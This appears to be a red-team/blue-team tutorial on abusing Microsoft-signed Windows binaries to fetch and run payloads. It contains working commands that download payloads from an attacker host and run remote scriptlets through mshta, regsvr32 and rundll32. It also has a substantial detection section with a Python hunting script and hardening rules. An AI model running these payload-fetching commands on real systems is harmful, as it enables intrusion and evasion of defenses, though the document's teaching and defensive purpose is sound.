Introduction / Overview
Legal & ethical disclaimer. Everything below is provided for education and for authorized security testing only. Run these commands solely on systems you own or have explicit, written permission to test. Unauthorized use against systems you do not control is illegal in most jurisdictions and is not endorsed by the author.
"Living off the Land" (LotL) is the practice of accomplishing offensive objectives — download, execution, persistence, defense evasion — using binaries, scripts and libraries that ship with the operating system and are signed by Microsoft. The catalogued versions of these binaries are tracked by the community LOLBAS project (Living Off The Land Binaries, Scripts and Libraries).
The appeal is simple: a Microsoft-signed binary is trusted by default. Application allowlisting (WDAC, AppLocker) often permits it, EDR baselines treat it as benign, and there is no malware file on disk to scan. In this article you will learn how five of the most abused LOLBAS — certutil.exe, bitsadmin.exe, mshta.exe, regsvr32.exe and rundll32.exe — can be used to fetch and execute payloads, and how a blue team detects and breaks each technique.
How it works / Background
LOLBAS abuse relies on unintended functionality in legitimate tools. Each binary has a documented, benign primary purpose, but also exposes secondary functionality that an attacker can repurpose:

| Binary | Intended purpose | Abused for |
|---|---|---|
| certutil.exe | Certificate / CA management | File download, Base64 decode |
| bitsadmin.exe | Background Intelligent Transfer Service jobs | Stealthy file download, job persistence |
| mshta.exe | Run HTML Applications (.hta) | Execute inline VBScript/JScript, remote scriptlets |
| regsvr32.exe | Register/unregister COM DLLs | Run remote scriptlet via COM (the "Squiblydoo" technique) |
| rundll32.exe | Call exported DLL functions | Proxy execution of DLLs and JavaScript |
Because the executing process is signed-by-microsoft.exe, the malicious behavior hides behind a trusted parent. These techniques map cleanly to MITRE ATT&CK T1218 — System Binary Proxy Execution (with sub-techniques T1218.010 regsvr32, T1218.011 rundll32, T1218.005 mshta) and T1105 — Ingress Tool Transfer.
Prerequisites / Lab setup
- A Windows 10/11 or Server VM you control, ideally snapshotted.
- A second host acting as the attacker / web server (Kali or any Linux).
- Defender real-time protection can stay on — that is the point; you want to see what slips past and what gets caught.
Start a simple delivery server on the attacker host:

```bash
# Serve payloads over HTTP from the attacker box
python3 -m http.server 8080
```

Attack walkthrough / PoC
1. certutil — download and decode
certutil was designed to fetch CRLs and certificates, so it speaks HTTP. The -urlcache flag turns it into a downloader; -f forces overwrite and -split writes the body to disk.
```powershell
# Download a payload to disk
certutil.exe -urlcache -split -f http://10.10.10.5:8080/payload.exe C:\Windows\Temp\p.exe
# certutil can also Base64-decode a staged blob (defeats naive content inspection)
certutil.exe -decode C:\Windows\Temp\enc.b64 C:\Windows\Temp\p.exe
```

Note: -urlcache leaves artifacts in the CryptnetUrlCache folder, which is itself a great forensic lead (covered below).
2. bitsadmin — transfer via the BITS service
BITS performs throttled, resumable transfers — the same mechanism Windows Update uses — so the network traffic blends in and the work is done by the svchost-hosted BITS service rather than your process.
```cmd
bitsadmin /transfer job1 /download /priority normal ^
    http://10.10.10.5:8080/payload.exe C:\Windows\Temp\p.exe
```

The modern PowerShell equivalent is Start-BitsTransfer, which uses the same service:

```powershell
Start-BitsTransfer -Source http://10.10.10.5:8080/payload.exe -Destination C:\Windows\Temp\p.exe
```

3. mshta — execute remote script with no payload on disk
mshta.exe runs HTML Applications, which can contain inline VBScript or JScript. It will fetch and run a remote .hta directly, so nothing malicious needs to touch disk.
```powershell
mshta.exe http://10.10.10.5:8080/evil.hta
```

A minimal evil.hta that spawns a process:

```html
<html><head><script language="VBScript">
Set s = CreateObject("WScript.Shell")
s.Run "calc.exe", 0, False
window.close()
</script></head><body></body></html>
```

4. regsvr32 — "Squiblydoo" remote scriptlet
regsvr32 can register a COM object whose registration logic lives in a remote .sct scriptlet, fetched over HTTP/S, again with nothing written to disk. This classic is known as Squiblydoo.
```powershell
regsvr32.exe /s /n /u /i:http://10.10.10.5:8080/evil.sct scrobj.dll
```

Flags: /s silent, /n do not call DllRegisterServer, /u unregister (triggers DllUnregisterServer → the scriptlet runs), /i passes the URL to the named object, and scrobj.dll is the Microsoft script COM runtime.
5. rundll32 — proxy DLL or JavaScript execution
rundll32 calls an exported function from a DLL. Attackers use it to run a malicious DLL's export, or to execute JavaScript via the javascript: moniker and mshtml.dll:
```powershell
# Run an exported function from a (malicious) DLL
rundll32.exe C:\Windows\Temp\evil.dll,EntryPoint
# JavaScript proxy execution — no .dll dropped by you
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("calc.exe")
```

Chained together, a realistic intrusion looks like: certutil/bitsadmin pulls the stage, then mshta/regsvr32/rundll32 executes it under a trusted parent. Once code runs, an operator pivots to credential and privilege-escalation work — see Windows token impersonation and privilege escalation and, in AD environments, Kerberoasting.
Mermaid diagram

Diagram: attacker-controlled content is fetched by a download LOLBin and run by an execution LOLBin, yielding code execution under a Microsoft-signed process that then escalates.
Detection & Defense (Blue Team)
LOLBAS abuse is detected through behavior and context, not file signatures. Defenders should weight detection at least as heavily as the offense.
1. Command-line and process-lineage telemetry. Enable command-line auditing (Audit Process Creation, Event ID 4688 with ProcessCommandLine) or Sysmon Event ID 1. Hunt for the tell-tale argument patterns:
- certutil with -urlcache, -decode, -encode, or any http argument.
- bitsadmin /transfer (and monitor BITS itself via the Microsoft-Windows-Bits-Client/Operational log, Event IDs 3/59/60).
- regsvr32 with /i: and a URL, or scrobj.dll.
- rundll32 with javascript:, vbscript:, or no DLL/ordinal at all.
- mshta with an http/https URL or a .hta argument.
2. Anomalous parent-child relationships. mshta.exe, regsvr32.exe or rundll32.exe spawning cmd.exe, powershell.exe or making outbound network connections is highly suspicious. Office apps (winword.exe, excel.exe) spawning any of these is a strong macro-delivery signal — Microsoft's Attack Surface Reduction (ASR) rules cover exactly this (e.g. Block Office applications from creating child processes and Block executable content from email/webmail).
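As an added example (not code from the original article), the following Python hunt applies the argument patterns from item 1 and the parent-child checks from item 2 to constructed Sysmon Event ID 1 / 4688-style records. The field names Image, ParentImage and CommandLine follow Sysmon's schema; the sample events and their paths are fabricated, and the rule names are my own.

```python
import ntpath
import re

# Argument-pattern rules from item 1 above: (rule name, image basename, regex applied to CommandLine)
ARG_RULES = [
    ("certutil download/decode", "certutil.exe", re.compile(r"-urlcache|-decode|-encode|https?://", re.I)),
    ("bitsadmin transfer", "bitsadmin.exe", re.compile(r"/transfer", re.I)),
    ("regsvr32 remote scriptlet", "regsvr32.exe", re.compile(r"/i:\S*https?://|scrobj\.dll", re.I)),
    ("rundll32 script moniker", "rundll32.exe", re.compile(r"\b(?:javascript|vbscript):", re.I)),
    ("mshta remote/.hta", "mshta.exe", re.compile(r"https?://|\.hta\b", re.I)),
]
PROXY_BINS = {"mshta.exe", "regsvr32.exe", "rundll32.exe"}  # execution LOLBins from item 2
SHELLS = {"cmd.exe", "powershell.exe"}                       # suspicious children of a proxy bin
OFFICE = {"winword.exe", "excel.exe"}                        # macro-delivery parents

def _args_after_image(cmdline):
    # Drop the leading (optionally quoted) image path; whatever remains are the arguments.
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s*(.*)$', cmdline, re.S)
    return m.group(1).strip() if m else ""

def classify(ev):
    """Return the rule names one Sysmon EID 1 / 4688-style event (a dict) triggers."""
    image = ntpath.basename(ev["Image"]).lower()
    parent = ntpath.basename(ev["ParentImage"]).lower()
    hits = [name for name, binary, rx in ARG_RULES
            if image == binary and rx.search(ev["CommandLine"])]
    if image == "rundll32.exe" and not _args_after_image(ev["CommandLine"]):
        hits.append("rundll32 without DLL/entry point")
    if parent in PROXY_BINS and image in SHELLS:
        hits.append(f"{parent} spawned {image}")
    if parent in OFFICE and image in PROXY_BINS:
        hits.append(f"Office app {parent} spawned {image}")
    return hits

def hunt(events):
    """Return {event index: [rule names]} for every event that triggers at least one rule."""
    return {i: h for i, h in ((i, classify(ev)) for i, ev in enumerate(events)) if h}

# Constructed sample events (fabricated, not real telemetry); command lines mirror the PoC section above.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://10.10.10.5:8080/payload.exe C:\Windows\Temp\p.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http://10.10.10.5:8080/evil.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"mshta.exe http://10.10.10.5:8080/evil.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"powershell.exe -NoProfile"},
]
```

Running `hunt(SAMPLE_EVENTS)` flags all four constructed events; a benign `certutil.exe -dump` or `rundll32.exe shell32.dll,Control_RunDLL` produces no hit, which is the point of matching on arguments and lineage rather than on the binary name alone.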
```powershell
# Example ASR rule: block Win32 API calls from Office macros
Add-MpPreference -AttackSurfaceReductionRules_Ids 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B `
    -AttackSurfaceReductionRules_Actions Enabled
```

3. Network egress controls. These techniques require outbound HTTP/S to attacker infrastructure. A forward proxy that restricts which processes may reach the internet, TLS inspection, and alerting on certutil/bitsadmin user-agents (Microsoft-Delivery-Optimization, Microsoft BITS) catch the download stage.
4. Forensic artifacts. certutil -urlcache writes to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE and the CryptnetUrlCache directories — a reliable retrospective indicator. BITS jobs persist in %ALLUSERSPROFILE%\Microsoft\Network\Downloader\qmgr*.dat.
5. Allowlisting that constrains LOLBins. WDAC / AppLocker cannot easily ban a signed system binary outright, but you can:
- Block mshta.exe and bitsadmin.exe entirely if your environment does not need them (deprecated by Microsoft).
- Use AppLocker DLL rules and script rules to limit regsvr32/rundll32 from loading non-approved content.
- Deploy WDAC in enforced mode so even signed binaries cannot load unsigned/remote script payloads.
6. Disable script COM where feasible. Removing or restricting the Windows Script Host and blocking scrobj.dll execution breaks Squiblydoo and many mshta/JScript chains.
Conclusion
LOLBAS techniques succeed precisely because the binaries are legitimate and trusted. certutil and bitsadmin pull the payload; mshta, regsvr32 and rundll32 execute it under a Microsoft signature — often with nothing malicious written to disk. For red teamers, these remain reliable, low-noise primitives. For defenders, the answer is not signature scanning but command-line auditing, process-lineage analytics, ASR rules, egress control and WDAC enforcement. Detect the behavior, not the file.
References
- MITRE ATT&CK — T1218 System Binary Proxy Execution: https://attack.mitre.org/techniques/T1218/
- MITRE ATT&CK — T1105 Ingress Tool Transfer: https://attack.mitre.org/techniques/T1105/
- LOLBAS Project: https://lolbas-project.github.io/
- Microsoft — Attack Surface Reduction (ASR) rules: https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference
- HackTricks — Windows LOLBAS / AV bypass: https://book.hacktricks.xyz/
- Microsoft — Windows Defender Application Control (WDAC): https://learn.microsoft.com/windows/security/application-security/application-control/